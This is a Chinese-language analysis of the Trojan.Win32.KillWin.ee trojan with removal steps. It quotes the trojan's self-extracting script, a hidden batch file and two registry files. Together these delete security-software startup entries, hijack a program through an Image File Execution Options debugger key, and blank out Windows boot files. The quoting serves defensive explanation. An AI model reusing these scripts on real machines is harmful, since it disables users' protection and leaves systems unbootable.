對清除Trojan.Win32.KillWin.ee病毒的方案分析
以下的文章主要向大家講述的是正確清除Trojan.Win32.KillWin.ee病毒的方案分析,現在病毒的發展速度已是越來越快,越來越多的偽裝及新型變種是一天接一天的瘋狂,面對如此情況,很多網民是只能一次又一次的進行系統還原或者是重裝系統。
而安全軟件在此時卻顯得力不從心,因為很多病毒木馬在發作前都開始解除安軟的保護功能,這不新出現的Trojan.Win32.KillWin.ee也具備此種功能。
病毒日新月異的今天,越來越多的偽裝及新型變種是一天接一天的瘋狂,面對如此情況,很多網民是只能一次又一次的進行系統還原或者是重裝系統。而安全軟件在此時卻顯得力不從心,因為很多病毒木馬在發作前都開始解除安軟的保護功能,這不新出現的Trojan.Win32.KillWin.ee也具備此種功能。
病毒分析
該病毒名為Trojan.Win32.KillWin.ee,文件雖然只有小小的169 KB(173,614 字節),但其威力卻不容小視。病毒為WINRAR自解壓縮包格式,可通過修改自身圖標為卡卡助手的標識來進行偽裝自身。
當Trojan.Win32.KillWin.ee病毒進駐到用戶計算機后,會釋放BAT和REG命令的執行文件,并利用命令方式刪除用戶計算機中的卡卡助手啟動項,禁止其真實的程序啟動,然后通過劫持卡卡的主程序并將其指向病毒主體gameover.exe程序。
該程序在使用自動解壓縮命令解壓自身后開始進行系統破壞,其自解壓命令如下:
Path=%SystemRoot%\system32\
SavePath
Setup=hidecmd.exe kv.bat
Silent=1
Overwrite=1
執行hidecmd.exe(隱藏執行BAT)用參數調用kv.bat隱藏執行。
kv.bat的內容為:
@echo off
%SystemRoot%\regedit /s kaka.reg
%SystemRoot%\regedit /s gameover.reg
Exit
病毒修改注冊表
在結束上述命令后,Trojan.Win32.KillWin.ee病毒源體開始接著導入到系統中兩個REG文件,來修改注冊表,其內容如下:
kaka.reg:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"KKDelay"="C:\\Program Files\\Rising\\AntiSpyware\\RunOnce.exe"
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"runeip"="\"C:\\Program Files\\Rising\\AntiSpyware\\runiep.exe\" /startup"
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL]
"Installed"="1"
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI]
"Installed"="1"
"NoChange"="1"
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS]
"Installed"="1"
病毒刪除卡卡助手#p#
到此時病毒依然沒有停手,其開始查找并刪除卡卡助手的相關啟動,其內容如下:
gameover.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe]
"Debugger"="C:\\winnt\\system32\\gameover.exe"
從而進行劫持卡卡主程序并將其指向釋放的病毒。
小提示:從這里%SystemRoot%\system32\可以看出作者針對的是WIN2K系列,因為剛才的WINRAR釋放腳本使用的是環境變量,只有在WIN2K系列操作平臺中才是WINNT文件夾,而在XP里是WINDOWS\system32\,所以這個劫持指向無效。
重要注釋
%System32%是一個可變路徑,Trojan.Win32.KillWin.ee病毒通過查詢操作系統來決定當前System文件夾的位置。Windows2000/NT中默認的安裝路徑是C:\Winnt\System32,windows95/98/me中默認的安裝路徑是C:\Windows\System,windowsXP中默認的安裝路徑是C:\Windows\System32。
%Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp 當前用戶TEMP緩存變量
%Windir%\ WINDODWS所在目錄
%DriveLetter%\ 邏輯驅動器根目錄
%ProgramFiles%\ 系統程序默認安裝目錄
%HomeDrive% = C:\ 當前啟動的系統的所在分區
%Documents and Settings%\ 當前用戶文檔根目錄
破壞系統的gameover.exe
Trojan.Win32.KillWin.ee病毒在對卡卡劫持后,開始進行下一步活動,在系統中放入gameover.exe程序進行系統破壞。其實gameover.exe也是一個自解壓縮包,內含自解壓腳本命令如下:
Path=C:\
SavePath
Silent=1
Overwrite=1
釋放了0字節的同名空文件替換以下系統文件,破壞系統啟動:
AUTOEXEC.BAT
boot.ini
bootfont.bin
CONFIG.SYS
IO.SYS
MSDOS.SYS
NTDETECT.COM
Ntldr
清除病毒
普通用戶可通過系統鏡像還原實現系統恢復,而對于有一定基礎的網民來說,可以系統光盤中復制上述的系統文件進行修復操作系統平臺。在查找文件時可以用DIR命令來查找其相關位置,如:首先進入光盤的盤符,然后輸入:DIR Autoexe.bat,系統會將此路徑下的Autoexe.bat文件的位置顯示出來,然后再進行復制文件,其命令格式如下:
COPY_源路徑_目標路徑(其中_為空格),比如:“COPY_X:\autoexe.bat_C:\”就表示將X盤根目錄下的Autoexe.bat文件拷貝到C盤根目錄下。
然后刪除系統目錄%SystemRoot%\system32\下的gameover.exe文件即可,最后進行殺毒軟件的升級與全盤殺毒,以防另類感染。
編者按:Trojan.Win32.KillWin.ee病毒雖然有其入駐破壞之道,但只要掌握其原理,在了解其運行過程與所添加的注冊表項目后,即可輕而易舉的將其清除出系統之外,還平臺一個安全的環境。
